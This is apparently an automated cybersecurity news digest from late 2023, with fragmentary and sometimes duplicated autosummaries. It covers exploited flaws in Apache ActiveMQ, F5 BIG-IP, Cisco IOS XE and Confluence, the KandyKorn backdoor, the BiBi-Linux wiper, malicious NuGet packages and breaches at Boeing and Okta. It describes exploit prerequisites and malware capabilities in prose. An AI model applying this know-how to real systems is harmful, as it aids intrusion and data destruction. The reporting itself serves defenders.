This approach, which combines unsupervised, supervised, and active learning in both cloud and local environments, has been refined by analyzing extensive data over time, resulting in a highly effective model capable of accurately predicting and anticipating new threats.In contrast, BlackBerry Cylance"s model has demonstrated a strong temporal predictive advantage, maintaining high detection rates without frequent model updates, as illustrated in the chart showing the TPA over months for the fourth-generation Cylance model. "The FSB arrested two Russian hackers who are accused of having helped Ukrainian entities carry out cyberattacks on critical infrastructure targets. The Russian intelligence agency Federal Security Service (FSB) arrested two individuals who are suspected of supporting Ukrainian entities to carry out cyberattacks to disrupt Russian critical infrastructure. The two men are facing high treason […]
The post Russian FSB arrested Russian hackers who supported Ukrainian cyber operations appeared first on Security Affairs.
"Autosummary:
Russian FSB arrested Russian hackers who supported Ukrainian cyber operations Pierluigi Paganini November 03, 2023 November 03, 2023 The FSB arrested two Russian hackers who are accused of having helped Ukrainian entities carry out cyberattacks on critical infrastructure targets. "Autosummary:
"Autosummary:
It should be noted, though, that cybercriminals have many ways to obtain Exchange credentials, including brute-forcing weak passwords, performing phishing attacks, purchasing them, or acquiring them from info-stealer logs. "Autosummary:
To successfully exploit this vulnerability, three things are required: Network access A manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter) A class on the classpath which can execute arbitrary code simply by instantiating it with a String parameter.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Apache ActiveMQ® is “middleware”, a popular open source, multi-protocol, Java-based message broker. "Island has announced the addition of Matt Fairbanks to its executive team as Chief Marketing Officer (CMO) and the appointment of Ellen Roeckl, Island’s former head of marketing, as the company’s first Chief Communications Officer (CCO). Fairbanks is tasked with global expansion of pipeline and product leadership; Roeckl will drive category awareness and communicate Island’s vision, capabilities, and perspectives to the company’s growing community of stakeholders and influencers. Fairbanks, most recently CMO at Sophos, is … More
The post Island names Matt Fairbanks as CMO and Ellen Roeckl as CCO appeared first on Help Net Security.
"Autosummary:
Fairbanks, most recently CMO at Sophos, is an accomplished IT and cybersecurity veteran with extensive experience leading marketing for some of the world’s most respected technology and cybersecurity brands, including McAfee, Citrix, Symantec, and Veritas. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwrhunterteam, @demonslay335, @billtoulas, @serghei, @Ionut_Ilascu, @LawrenceAbrams, @fwosar, @BleepinComputer, @SecurityJoes, @rivitna2, @BushidoToken, @AlvieriD, @rapid7, @BradSmi, @uptycs, @pcrisk, @PogoWasRight, and @BrettCallow. Finally, new research was released this week about ransomware, including: Hive"s possible return is particularly interesting, as they were previously disrupted after the FBI hacked Hive"s servers and seized infrastructure. "Researchers disclosed four zero-day flaws in Microsoft Exchange that can be remotely exploited to execute arbitrary code or disclose sensitive information on vulnerable installs. Trend Micro’s Zero Day Initiative (ZDI) disclosed four zero-day vulnerabilities in Microsoft Exchange that can be remotely exploited by an authenticated attacker to execute arbitrary code or disclose sensitive information on […]
The post ZDI discloses four zero-day flaws in Microsoft Exchange appeared first on Security Affairs.
"Autosummary:
ZDI discloses four zero-day flaws in Microsoft Exchange Pierluigi Paganini November 03, 2023 November 03, 2023 Researchers disclosed four zero-day flaws in Microsoft Exchange that can be remotely exploited to execute arbitrary code or disclose sensitive information on vulnerable installs. – – This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. – – This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. "The global cybersecurity workforce has reached 5.5 million people, an 8.7% increase from 2022, representing 440,000 new jobs, according to ISC2. While this is the highest workforce ever recorded, the report shows that demand is still outpacing the supply. The cybersecurity workforce gap has reached a record high, with 4 million professionals needed to safeguard digital assets adequately. The research also finds new challenges impacting professionals in the field, including economic uncertainty, artificial intelligence, fragmented … More
The post Cybersecurity workforce shortages: 67% report people deficits appeared first on Help Net Security.
"Autosummary:
47% of respondents experienced cutbacks, which included budget cuts, layoffs and hiring and promotion freezes 35% faced cuts to cybersecurity training programs, vital for skills development and workforce growth Two-thirds of respondents say that cutbacks have negatively impacted their productivity, team morale and increased their workload 57% said their response to threats has been inhibited by cutbacks, and 52% have seen an increase in insider risk-related incidents 31% of professionals believe that cutbacks will continue into 2024, and 70% expect those cutbacks to include layoffs Uncovering effective hiring, retention and team-building practices 47% of respondents have no or minimal knowledge of artificial intelligence (AI) 47% see cloud computing security as the most sought-after skill for career advancement 45% of respondents foresee AI as their top challenge over the next two years “While we celebrate the record number of new cybersecurity professionals entering the field, the pressing reality is that we must double this workforce to adequately protect organizations and their critical assets,” said ISC2 CEO Clar Rosso. "Modern security tools continue to improve in their ability to defend organizations’ networks and endpoints against cybercriminals. But the bad actors still occasionally find a way in. Security teams must be able to stop threats and restore normal operations as quickly as possible. That’s why it’s essential that these teams not only have the right tools but also understand how to effectively respond to an incident. Resources like an incident response template can be customized … More
The post 6 steps to accelerate cybersecurity incident response appeared first on Help Net Security.
"Autosummary:
Bonus step: Investigation Goal: Determine who, what, when, where, why, how At this stage it is worth noting another important aspect of IR: investigation.Leveraging a templated incident response plan to establish roles and responsibilities for all participants — security leaders, operations managers, help desk teams, identity and access managers, as well as audit, compliance, communications, and executives — can ensure efficient coordination. During the identification phase, you will document all indicators of compromise (IOCs) gathered from alerts, such as compromised hosts and users, malicious files and process, new registry keys, and more.This isn’t always possible, however, so you may need to take measures like patching, changing passwords, killing specific services, and more. Now that the incident is comfortably behind you, it’s time to reflect on each major IR step and answer key questions, there are plenty of questions and aspects that should be asked and reviewed, below are a few examples: Identification: How long did it take to detect the incident after the initial compromise occurred? With the containment phase complete, you can move to eradication, which can be handled through either disk cleaning, restoring to a clean backup, or full disk reimaging. Short-term : This includes steps you might take in the moment, like shutting down systems, disconnecting devices from the network, and actively observing the threat actor’s activities. Also, using an endpoint detection and response (EDR) platform or extended detection and response (XDR) tool with centralized control will let you quickly take defensive actions like isolating machines, disconnecting them from the network, and executing counteracting commands at scale. "Top executives — the employee group most targeted by threat actors — are frequently provided unfettered access to valuable data sources and networked assets, according to Ivanti. Executives access unauthorized work data While 96% of leaders say they are at least moderately supportive and invested in their organization’s cybersecurity mandate, the reality is that 49% of CXOs have requested to bypass one or more security measures in the past year. Although security leaders are aware … More
The post Cybersecurity habits and behaviors executives need to be aware of appeared first on Help Net Security.
"Autosummary:
The report outlines steps businesses and security professionals can leverage to close the executive conduct gap including conducting audits, prioritizing remediation for the most common risks, conducting gamified security training sessions, and implementing “white glove” security programs. "Autosummary:
"Autosummary:
"Autosummary:
Both the MSI files contain a 32-bit .NET executable named dllloader that, in turn, loads a Base64-encoded payload called EncDLL that functions akin to ransomware, searching and terminating a specific set of processes before commencing the encryption process and appending the encrypted files with the ".locked" extension. "Autosummary:
The file contained the following information on current and former Okta employees and their dependents: Full names Social Security Numbers (SSNs) Health or Medical Insurance plan number Okta learned about the breach on October 12, 2023, when Rightway disclosed the attack, and immediately launched an investigation to determine the extent of the compromise. "Ransomware-wielding attackers are trying to break into servers running outdated versions of Apache ActiveMQ by exploiting a recently fixed vulnerability (CVE-2023-46604). “Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” Rapid7 researchers shared on Wednesday. “Based on the ransom note and … More
The post Attackers exploiting Apache ActiveMQ flaw to deliver ransomware (CVE-2023-46604) appeared first on Help Net Security.
"Autosummary:
ActiveMQ supports a variety of protocols, including OpenWire (the native wire format of ActiveMQ), MQTT (messaging protocol for IoT), AMQP (protocol for business messaging and IoT device management), REST, STOMP, and WebSockets. "SAIC announced new offerings for Tenjin and additional features for Koverse. “The new offerings and features for SAIC’s Data Science Suite ensure the right people have access to the right data at the right time to gain actionable insights for decision-making and problem solving across multiple domains,” said Andy Henson, VP, Digital Innovation Factory at SAIC. The innovative Tenjin offerings enable organizations to handle and store their complex sensitive data securely from the enterprise to … More
The post SAIC evolves its AI and ML ecosystem to improve government mission outcomes appeared first on Help Net Security.
"Autosummary:
"Action1 announced its latest release. Global enterprises navigating complex environments can now ensure rapid adoption of Action1’s platform within their organization for reduced Mean-Time-To-Remediate (MTTR) while eliminating gaps in their remediation processes. Key features: Automation and cost savings. Enterprises can reduce the time required for solution adoption by instantly mapping automated vulnerability remediation workflows to their existing IT infrastructure organization-wide in a few minutes. Single Sign-On (SSO). Customers can implement more secure and simplified access … More
The post Action1 platform updates automate vulnerability remediation appeared first on Help Net Security.
"Autosummary:
“Enterprise IT teams often struggle with manually organizing their endpoints within their remediation solution, which can drag on for months, while leaving their organization exposed to risks arising from gaps in their remediation strategies,” said Mike Walters, President of Action1. "Rapid7 researchers warn of the suspected exploitation of a recently disclosed critical security flaw (CVE-2023-46604) in the Apache ActiveMQ. Cybersecurity researchers at Rapid7 are warning of the suspected exploitation of the recently disclosed critical vulnerability CVE-2023-46604 in the Apache ActiveMQ. Apache ActiveMQ is an open-source message broker software that serves as a message-oriented middleware (MOM) […]
The post Suspected exploitation of Apache ActiveMQ flaw CVE-2023-46604 to install HelloKitty ransomware appeared first on Security Affairs.
"Autosummary:
Legacy OpenWire Module 5.8.0 before 5.15.16 Since the bug’s disclosure, a proof-of-concept (PoC) exploit code and additional technical specifics have been made publicly available, with Rapid7 noting that the behavior it observed in the two victim networks is “similar to what we would expect from the exploitation of CVE-2023-46604.” "Boeing confirmed it is facing a cyber incident that hit its global services division, the company pointed out that flight safety isn’t affected. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales, the aerospace giant has 156,000 (2022). Last week, the […]
The post Boeing confirmed its services division suffered a cyberattack appeared first on Security Affairs.
"Autosummary:
“Boeing, the 60 billion Company, together with its subsidiaries, designs, develops, manufactures, sells, services, and supports commercial jetliners, military aircraft, satellites, missile defense, human space flight, and launch systems and services worldwide.” "Autosummary:
"Autosummary:
"On October 31, 2023, Mr. Cooper determined that the company had experienced a cybersecurity incident in which an unauthorized third party gained access to certain technology systems," reads a notice of cyber security incident on Mr. Cooper’s website. "Autosummary:
Vulnerable versions range between 5.15 and 5.18, including Legacy OpenWire Module versions, are fixed in versions are 5.15.16, 5.16.7, 5.17.6, and 5.18.3. "Autosummary:
Boeing page on LockBit data leak site (BleepingComputer) The LockBit ransomware-as-a-service (RaaS) operation surfaced in September 2019, with notable victims including the Continental automotive giant, the UK Royal Mail, the Italian Internal Revenue Service, and the City of Oakland. "Autosummary:
The file contained the following information on current and former Okta employees and their dependents: Full names Social Security Numbers (SSNs) Health or Medical Insurance plan number Okta learned about the breach on October 12, 2023, when Rightway disclosed the attack, and immediately launched an investigation to determine the extent of the compromise. "Okta warns approximately 5,000 employees that their personal information was compromised due to a third-party vendor data breach. Cloud identity and access management solutions provider Okta warns nearly 5,000 employees that their personal information was exposed due to a data breach suffered by the third-party vendor Rightway Healthcare. According to the data breach notification, Rightway […]
The post Okta discloses a new data breach after a third-party vendor was hacked appeared first on Security Affairs.
"Autosummary:
Okta discloses a new data breach after a third-party vendor was hacked Pierluigi Paganini November 02, 2023 November 02, 2023 Okta warns approximately 5,000 employees that their personal information was compromised due to a third-party vendor data breach. "Autosummary:
If you can"t immediately patch your Confluence instances, you can also remove known attack vectors by blocking access on the following endpoints by modifying the /<confluence-install-dir>/confluence/WEB-INF/web.xml as explained in the advisory and restarting the vulnerable instance: /json/setup-restore.action /json/setup-restore-local.action /json/setup-restore-progress.action "These mitigation actions are limited and not a replacement for patching your instance; you must patch as soon as possible," Atlassian warned. "Autosummary:
"As a result of this incident, many of our key operating systems, including ACENET, our Warehouse Management Systems, the Ace Retailer Mobile Assistant (ARMA), Hot Sheets, Invoices, Ace Rewards and the Care Center"s phone system have been interrupted or suspended. The company stated that it has engaged with a group of IT experts to help them restore the impacted systems, but because they deal with "a fast-moving, dynamic situation," details on the process and system status cannot be conveyed with accuracy. "Autosummary:
Specifically, HLOADER performs the following operations upon launch: Renames itself from Discord to MacOS.tmp Renames the legitimate Discord binary from .lock to Discord Executes both Discord and .log using NSTask.launchAndReturnError Renames both files back to their initial names File renaming scheme used for persistence (Elastic) KandyKorn KandyKorn is an advanced final-stage payload that enables Lazarus to access and steal data from the infected computer. KandyKorn"s command execution code (Elastic) In summary, KandyKorn is a particularly stealthy backdoor capable of data retrieval, directory listing, file upload/download, secure deletion, process termination, and command execution. "Autosummary:
"Despite ongoing discussions with Henry"s team, we have not received any indication of their willingness to prioritize the security of their clients, partners, and employees, let alone protect their own network," the threat actors said. "Autosummary:
"Ransomware incidents rising again as criminals use data exfiltration and supply chain attacks to maximize their leverage, according to Allianz. Allianz Commercial analysis of large cyber losses shows the number of cases in which data is exfiltrated is soaring, as is the number of incidents becoming public. Cyber breaches that are not detected and contained early can be 1,000 times more expensive than those that are. Companies’ cybersecurity priorities should include bolstering their detection and … More
The post Public exposure of data breaches is becoming inevitable appeared first on Help Net Security.
"Autosummary:
“Today, if you have data exfiltration it will likely go public, and every company needs to be prepared for this,” says Rishi Baviskar, Global Head of Cyber Risk Consulting, Allianz Commercial.For example, the MOVEit mass cyberattack, which exploited a data transfer software product, impacting millions of individuals and thousands of companies, contributed to the increase in the frequency of claims in 2023 to date, affecting multiple policyholders simultaneously. “Double and triple extortion incidents – using a combination of encryption, data exfiltration and DDoS – to obtain money are not new but they are now more prevalent,’ says Michael Daum, Global Head of Cyber Claims, Allianz Commercial. Threat actors embrace AI for faster, automated attacks Threat actors are now exploring ways to use AI to automate and accelerate attacks, creating more effective AI-powered malware, phishing, and voice simulation. "Ransomware attacks continue at a record-breaking pace, with Q3 2023 global ransomware attack frequency up 11% over Q2 and 95% year-over-year (YoY), according to Corvus Insurance. In its Q2 2023 Global Ransomware Report, Corvus noted a significant resurgence in global ransomware attacks, which has continued through the third quarter. Now, with two months remaining in the year, the number of ransomware victims in 2023 has already surpassed what was observed for 2021 and 2022. If … More
The post Ransomware attacks set to break records in 2023 appeared first on Help Net Security.
"Autosummary:
Government agencies – The impetus behind these attacks was LockBit, which tripled its government victims from Q2 to Q3 (mostly cities and municipalities) (+95%) Additional industries that experienced spikes include manufacturing (+60%), oil and gas (+142%), and transportation, logistics and storage (+50%). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
KANDYKORN, which is the final-stage payload, is a full-featured memory resident RAT with built-in capabilities to enumerate files, run additional malware, exfiltrate data, terminate processes, and run arbitrary commands. "Autosummary:
"Autosummary:
Victims of the operation span various countries such as Saudi Arabia, the United Arab Emirates, Jordan, Kuwait, Oman, Iraq, and Israel. "Last weekend, the British Library suffered a cyberattack that caused a major IT outage, impacting many of its services. The British Library is facing a major outage that impacts the website and many of its services following a cyber attack that took place on October 28. The British Library is the national library of the […]
The post British Library suffers major outage due to cyberattack appeared first on Security Affairs.
"Autosummary:
Attacco che segue quello subìto, il 28 Ottobre, dalla @torontolibrary 🇨🇦 pic.twitter.com/GpBUoZgoRG — Claudio (@sonoclaudio) October 31, 2023 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, British Library) "Autosummary:
"Autosummary:
"Autosummary:
Impacted and fixed versions are given below: 17.1.0 (affected), fixed on 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG and later 16.1.0 – 16.1.4 (affected), fixed on 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG and later 15.1.0 – 15.1.10 (affected), fixed on 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG and later 14.1.0 – 14.1.5 (affected), fixed on 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG and later 13.1.0 – 13.1.5 (affected), fixed on 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG and later F5 has also published a script that helps mitigate the RCE flaw, the usage instructions for which can be found here. "US CISA added two vulnerabilities, tracked as CVE-2023-46747 and CVE-2023-46748, in BIG-IP to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerabilities CVE-2023-46747 and CVE-2023-46748 in BIG-IP to its Known Exploited Vulnerabilities catalog. CISA has the two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The two […]
The post CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini November 01, 2023 November 01, 2023 US CISA added two vulnerabilities, tracked as CVE-2023-46747 and CVE-2023-46748, in BIG-IP to its Known Exploited Vulnerabilities catalog. "Experts warn that threat actors started exploiting the critical flaw CVE-2023-46747 in F5 BIG-IP installs less than five days after PoC exploit disclosure. F5 this week warned customers about a critical security vulnerability, tracked as CVE-2023-46747 (CVSS 9.8), that impacts BIG-IP and could result in unauthenticated remote code execution. The vulnerability resides in the configuration […]
The post Threat actors actively exploit F5 BIG-IP flaws CVE-2023-46747 and CVE-2023-46748 appeared first on Security Affairs.
"Autosummary:
The vulnerability affects the following versions: Product Branch Versions known to be vulnerable1 Fixes introduced in Severity CVSSv3 score2 Vulnerable component or feature BIG-IP (all modules) 17.x 17.1.0 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG3 Critical 9.8 Configuration utility 16.x 16.1.0 – 16.1.4 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG3 15.x 15.1.0 – 15.1.10 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG3 14.x 14.1.0 – 14.1.5 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG3 13.x 13.1.0 – 13.1.5 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG3 BIG-IQ Centralized Management "A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. During a forensics investigation, Security Joes Incident Response team discovered a new Linux Wiper malware they tracked as BiBi-Linux Wiper. Pro-Hamas hacktivist group used the wiper to destroy the infrastructure of Israeli companies. The researchers noticed that the malware […]
The post Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper appeared first on Security Affairs.
"Autosummary:
Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper Pierluigi Paganini November 01, 2023 November 01, 2023 A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. "Autosummary:
Since its launch, the threat actors have been responsible for a stream of attacks, including Capita, Sobeys, Knauf, and Yellow Pages Canada. Black Basta ransomware ransom note created on TPL workstations Source: BleepingComputer According to a TPL employee, the attack occurred overnight on October 27th, impacting numerous services Saturday morning. "Autosummary:
"Autosummary:
"Autosummary:
The kill switch demonstrated several functionalities, including: killing the parent process, i.e., the original Mozi malware, disabling some system services such as sshd and dropbear, replacing the original Mozi file with itself, executing some router/device configuration commands, disabling access to various ports ( iptables -j DROP ), and ), and establishing the same foothold as the replaced original Mozi file We identified two versions of the control payload, with the latest one functioning as an envelope containing the first one with minor modifications, such as adding a function to ping a remote server, probably meant for statistical purposes. "Autosummary:
Attacker sends commands for reconnaissance purposes source: LeakIX In a PCAP file of the session shared with BleepingComputer, we can see the attackers execute the following commands: show ip interface brief show ip dns view show ip name-servers These are all commands that serve reconnaissance purposes, to collect information that would lead to the discovery of high-value targets Cisco patches more IOS XE versions Cisco has updated its security bulletin for CVE-2023-20198 on October 30, announcing updates for IOS XE that address the vulnerability. "Without the right metrics, vulnerability management is pretty pointless. If you’re not measuring, how do you know it’s working? So how do you know what to focus on? The list is potentially endless, and it can be hard to know what’s really important. In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet … More
The post Vulnerability management metrics: How to measure success appeared first on Help Net Security.
"Autosummary:
In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet vulnerability remediation SLAs and benchmarks Help pass audits and compliance Demonstrate ROI on security tools Simplify risk analysis Prioritize resource allocation Why vulnerability management needs metrics Measuring how quickly you find, prioritize and fix flaws allows you to continuously monitor and optimize your security.How long it takes to fix issues is down to you, and this gives you a current snapshot of your ‘cyber hygiene’ – the scan coverage, the time taken to fix issues over a period of six months, and the average time to fix issues overall.Modern scanners like Intruder provide automated, audit-ready reports, but it’s important to know where all your digital assets are to avoid blind spots, unpatched systems and inaccurate reporting – which is why asset discovery is integral to successful vulnerability management. "Nearly 8 in 10 small business leaders admit they are anxious about the safety of their company’s sensitive data and information, according to Shred-it. According to the Identity Theft Resource Center’s report, the number of data breaches remains in line with the all-time high set in 2021, and consumers are not oblivious to the stark realities of cybercrime. 81% of consumers would stop engaging with a brand online following a data breach, stated a Ping … More
The post The hidden costs of data breaches for small businesses appeared first on Help Net Security.
"Autosummary:
Data breaches affect 1 in 4 small businesses This year, Shred-it’s report found that 1 in 4 of the small business leaders surveyed reportedly experienced a data breach in the past and, of those, 50% said it was caused by employee error. "Canada banned the Chinese messaging app WeChat and Kaspersky antivirus on government mobile devices due to privacy and security risks. The Government of Canada announced a ban on the use of the WeChat and Kaspersky applications on government-issued mobile devices due to privacy and security risks. The ban will be effective starting from October 30, […]
The post Canada bans WeChat and Kaspersky apps on government-issued mobile devices appeared first on Security Affairs.
"Autosummary:
Canada bans WeChat and Kaspersky apps on government-issued mobile devices Pierluigi Paganini October 31, 2023 October 31, 2023 Canada banned the Chinese messaging app WeChat and Kaspersky antivirus on government mobile devices due to privacy and security risks. "From tomorrow, the UK government is hosting the first global AI Safety Summit, bringing together about 100 people from industry and government to develop a shared understanding of the emerging risks of leading-edge AI while unlocking its benefits.
The event will be held at Bletchley Park, a site in Milton Keynes that became the home of code breakers during World War II and saw the development of Colossus, the world’s first programmable digital electronic computer, used to decrypt the Nazi Party’s Enigma code, shortening the war by at least two years.
Autosummary:
“We do need to look at what impact AI is going to have on the current economy and the jobs that we currently do, and hopefully balance that with what opportunities, new industries, and new jobs AI is going to create,” Blows said Leadership in this space also needs to emerge in the coming months, said the Forum on Information and Democracy"s Bak, who added that while he applauded the UK government for trying to grasp this particular nettle, any future policy or regulatory work that takes place to address the impact of these frontier technologies needs to reflect more than just the views of those who can afford a seat at the table, and focus on the power imbalances that exist between civil society and the corporate world. “The UK wants to be seen as an innovation hub and [AI technologies are] clearly going to be a massive area of growth and development, both for the economy and the workforce,” said Philip Blows, CEO of StreaksAI, a UK-based developer of AI technology. "Atlassian is urging enterprise administrators to update their on-premises Confluence Data Center and Server installations quickly to plug a critical security vulnerability (CVE-2023-22518) that could lead to “significant data loss if exploited by an unauthenticated attacker.” About CVE-2023-22518 CVE-2023-22518 has been categorized as an improper authorization vulnerability, but no other details have been shared by the Australian software maker. It affects all versions of Confluence Data Center and Server before versions 7.19.16, 8.3.4, 8.4.4, 8.5.3 … More
The post Atlassian patches critical Confluence bug, urges for immediate action (CVE-2023-22518) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Dragos announced the expansion of its combined capabilities in partnership with Rockwell Automation. With this expansion, Rockwell will be making the Dragos Platform available to organizations for enhanced ICS/OT cybersecurity threat detection, providing global deployment services and support capabilities to help customers operationalize their security investment. The threat detection capabilities build on the previous global agreement between Dragos and Rockwell for the OT Incident Response Retainer (IRR) program that helps industrial organizations prepare for, respond … More
The post Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations appeared first on Help Net Security.
"Autosummary:
"Attackers have started using new wiper malware called BiBi-Linux to attack Israeli companies and destroy their data. The BiBi-Linux wiper The Security Joes Incident Response team found the malware during a forensics investigation of a breach within an Israeli company. “This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions,” Security Joes researchers … More
The post BiBi-Linux wiper targets Israeli companies appeared first on Help Net Security.
"Autosummary:
“During execution, it produces extensive [terminal] output, which can be mitigated using the ‘nohup’ command. "Autosummary:
Software supply chain security firm ReversingLabs described the campaign as coordinated and ongoing since August 1, 2023, while linking it to a host of rogue NuGet packages that were observed delivering a remote access trojan called SeroXen RAT. "The threat actors behind it are tenacious in their desire to plant malware into the NuGet repository, and to continuously publish new malicious packages," Karlo Zanki, reverse engineer at ReversingLabs, said in a report shared with The Hacker News.API These packages, which span several versions, imitate popular packages and exploit NuGet"s MSBuild integrations feature in order to implant malicious code on their victims, a feature called inline tasks to achieve code execution. "Autosummary:
"Autosummary:
"Researchers publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Researchers from Researchers at Horizon3.ai publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Cisco recently warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited […]
The post Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198 appeared first on Security Affairs.
"Autosummary:
Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198 Pierluigi Paganini October 31, 2023 October 31, 2023 Researchers publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Cisco recently warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The analysts also report observing strong ties to a campaign reported by Phylum at the start of the month, where the attackers used typosquatting to mimic crypto projects and deliver SeroXen RAT. ReversingLabs reports that the threat actors immediately attempted to upload new packages after previous ones were removed, showing intent to continue the campaign.The purpose of the package: "To demonstrate that any NuGet package can run arbitrary code on your machine."" However, this is the first documented case of threat actors leveraging this feature in malicious NuGet packages. "Autosummary:
Google app mistakenly flagged as malware (BleepingComputer) Avast antivirus SDK behind false positive While Google couldn"t pinpoint the security service or app that was triggering the false positive, Avast confirmed on Tuesday that its Android antivirus SDK was the one that mistakenly tagged the Google Quick Search Box app launcher as malware. "Autosummary:
"Autosummary:
A threat actor calling themselves "pwn0001" posted on the Breach Forums black hat hacking site said that they had the records of 815 million people available, including Aadhaar and passport information, names, phone numbers, and addresses. "Autosummary:
"Autosummary:
Several reasons stand out: security has a reputation of being a male-dominated, jargon-heavy and elitist sector which is hard to break into without the right qualifications, discrimination: 30% of female security professionals say they feel discriminated against at work, a perception that jobs don’t offer sufficient flexible working options, employers failing to encourage new mothers back into the workplace, a bias from employers towards screening applicants by qualifications/certifications rather than experience or transferable skills, which may mean that new mothers returning from a break who may be looking for a career change are ruled out, a perception that security is just about technical skills, when there are varied roles that require creativity, flexibility, good communication, problem solving and other skills relatively low numbers of girls studying STEM subjects at school/university a vicious circle in that the security sector lacks female mentors and role models to encourage the next generation into the industry Are things improving?Women, for example, hold just a quarter of security roles worldwide, as gender diversity in security remains a stubborn challenge and, unsurprisingly, as such mirrors the reality in computer sciences.As we wrap up October, which is also Global Diversity Awareness Month, this is an opportune moment to reflect on the actions needed to break down the biases and barriers that are hindering the participation of women in security, as well as to consider the value of inclusion in the security workforce. It’s probably no surprise then that gender, racial and ethnic diversity also remains lacking, and that’s despite the fact that a diverse and inclusive workforce is known to foster innovation and growth, not to mention its contribution to a more equitable society. "More than one-third of companies still do not have a well-rounded, holistic ransomware strategy in place, according to Zerto. Immediate recovery crucial for businesses’ survival The survey also found that companies are reevaluating their data protection and cyber resilience strategies to align more closely with the threats they are facing. The report shows that 35.4% of companies are not prioritizing recovery. This is concerning as ransomware actors are becoming more capable of impounding data. Businesses … More
The post Companies scramble to integrate immediate recovery into ransomware plans appeared first on Help Net Security.
"Autosummary:
Reevaluating data protection in the face of ransomware Still, the fact that companies are reevaluating strategies they have in place, especially considering that nearly two thirds (63.1%) of those surveyed have multiple data protection and ransomware detection tools at their disposal, signals that prevention is not enough and that legacy data protection falls short. "The rapid proliferation of Internet of Things (IoT) devices has ushered in a new era of connectivity and convenience, transforming the way we live and work. However, this interconnectivity has also given rise to a host of cybersecurity challenges and vulnerabilities. Protecting the vast and diverse array of IoT devices, from smart home appliances to industrial sensors, has become an imperative in safeguarding data, privacy, and critical infrastructure. In this Help Net Security round-up, we … More
The post IoT’s convenience comes with cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
"Google has expanded its bug bounty program, aka Vulnerability Rewards Program (VRP), to cover threats that could arise from Google’s generative AI systems. Google’s AI bug bounty program Following the voluntary commitment to the Biden-Harris Administration to develop responsible AI and manage its risks, Google has added AI-related risks to its bug bounty program, which gives recognition and compensation to ethical hackers who successfully find and disclose vulnerabilities in Google’s systems. The company identified common … More
The post Google expands bug bounty program to cover AI-related threats appeared first on Help Net Security.
"Autosummary:
"At some point in the movie “Groundhog Day,” Phil Connors breaks his bedside radio when he is woken up (yet again) by the song “I Got You Babe”. This déjà vu seems to await companies that fall victim to ransomware and fail to orchestrate the proper response. The FBI has recently warned about dual ransomware attacks, a new trend that involves criminals carrying out two or more attacks in close proximity to each other. The … More
The post The dangers of dual ransomware attacks appeared first on Help Net Security.
"Autosummary:
In a traditional disaster recovery scenario, root causes are known and causes mitigated, but in a cyber-attack scenario, without the proper response actions to investigate and mitigate what you find, systems are restored along with all the malicious accounts, compromised passwords, persistence mechanisms, and other malicious artifacts, while protective controls with missing rules or that were bypassed remain ineffective to stop a recurrence. Preventing a follow-up attack These response actions push out the achievable recovery time objective, but the vulnerabilities found must be patched, the malicious accounts removed, the protective and detective controls bolstered to prevent or detect a recurrence, and all malicious artefacts must be removed prior to redeployment back into production. "Autosummary:
"A sophisticated malware tracked as StripedFly remained undetected for five years and infected approximately one million devices. Researchers from Kaspersky discovered a sophisticated malware, dubbed StripedFly, that remained under the radar for five years masquerading as a cryptocurrency miner. In 2022, the researchers detected within the WININIT.EXE process an older code that was associated with […]
